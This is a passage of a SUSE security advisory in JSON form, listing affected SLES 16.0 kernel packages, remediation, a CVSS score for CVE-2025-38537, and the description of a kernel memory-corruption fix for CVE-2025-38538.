"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38537",
"url": "https://www.suse.com/security/cve/CVE-2025-38537"
},
{
"category": "external",
"summary": "SUSE Bug 1248229 for CVE-2025-38537",
"url": "https://bugzilla.suse.com/1248229"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38537"
},
{
"cve": "CVE-2025-38538",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38538"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: nbpfaxi: Fix memory corruption in probe()\n\nThe nbpf-\u003echan[] array is allocated earlier in the nbpf_probe() function\nand it has \"num_channels\" elements. These three loops iterate one\nelement farther than they should and corrupt memory.\n\nThe changes to the second loop are more involved. In this case, we\u0027re\ncopying data from the irqbuf[] array into the nbpf-\u003echan[] array. If\nthe data in irqbuf[i] is the error IRQ then we skip it, so the iterators\nare not in sync. I added a check to ensure that we don\u0027t go beyond the\nend of the irqbuf[] array. I\u0027m pretty sure this can\u0027t happen, but it\nseemed harmless to add a check.\n\nOn the other hand, after the loop has ended there is a check to ensure\nthat the \"chan\" iterator is where we expect it to be. In the original\ncode we went one element beyond the end of the array so the iterator\nwasn\u0027t in the correct place and it would always return -EINVAL. However,\nnow it will always be in the correct place. I deleted the check since\nwe know the result.",
"title": "CVE description"
}
